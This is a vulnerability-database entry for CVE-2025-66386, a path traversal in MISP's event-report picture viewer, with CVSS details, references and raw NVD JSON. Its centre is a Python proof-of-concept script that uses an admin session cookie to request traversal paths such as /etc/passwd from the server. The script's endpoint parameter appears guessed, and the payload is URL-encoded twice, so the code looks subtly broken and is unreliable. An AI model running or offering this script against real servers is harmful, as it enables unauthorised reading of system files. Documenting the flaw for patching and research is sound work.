CVE-2025-66386

Description

app/Model/EventReport.php in MISP before 2.5.27 allows path traversal in view picture for a site-admin.

CVSS Details

CVSS Score

4.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MISP < 2.5.27

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2025-66386 Path Traversal PoC for MISP < 2.5.27
# Target: MISP instance with site-admin access

def exploit_path_traversal(target_url, session_cookie, target_file):
    """
    Exploit path traversal in MISP EventReport view picture function
    
    Args:
        target_url: Base URL of MISP instance
        session_cookie: Valid site-admin session cookie
        target_file: File to read (e.g., /etc/passwd)
    
    Returns:
        File contents if successful, None otherwise
    """
    # Construct path traversal payload
    # Using URL encoding to bypass basic filters
    traversal = "../../../../.." + target_file
    encoded_path = urllib.parse.quote(traversal, safe='')
    
    # Target endpoint for EventReport view picture
    endpoint = f"{target_url}/eventReports/viewPicture"
    
    headers = {
        'Cookie': f'MISPISPSESSID={session_cookie}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    # Payload with path traversal
    params = {
        'event_id': '1',
        'id': '1',
        'path': encoded_path
    }
    
    try:
        response = requests.get(endpoint, params=params, headers=headers, timeout=10)
        if response.status_code == 200 and len(response.content) > 0:
            return response.content
        else:
            return None
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

# Example usage
if __name__ == "__main__":
    target = "https://vulnerable-misp-server.com"
    cookie = "your_site_admin_session_cookie"
    file_to_read = "/etc/passwd"
    
    result = exploit_path_traversal(target, cookie, file_to_read)
    if result:
        print(f"File contents:\n{result.decode('utf-8', errors='ignore')}")
    else:
        print("Exploitation failed or file not accessible")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66386
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66386
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66386/
[4] VulDB https://vuldb.com/cve/CVE-2025-66386
[5] https://github.com/MISP/MISP/commit/7f4a0386d38672eddc139f5735d71c3b749623ce
[6] https://github.com/MISP/MISP/compare/v2.5.26...v2.5.27

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66386", "sourceIdentifier": "[email protected]", "published": "2025-11-28T07:15:59.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "app/Model/EventReport.php in MISP before 2.5.27 allows path traversal in view picture for a site-admin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "references": [{"url": "https://github.com/MISP/MISP/commit/7f4a0386d38672eddc139f5735d71c3b749623ce", "source": "[email protected]"}, {"url": "https://github.com/MISP/MISP/compare/v2.5.26...v2.5.27", "source": "[email protected]"}]}}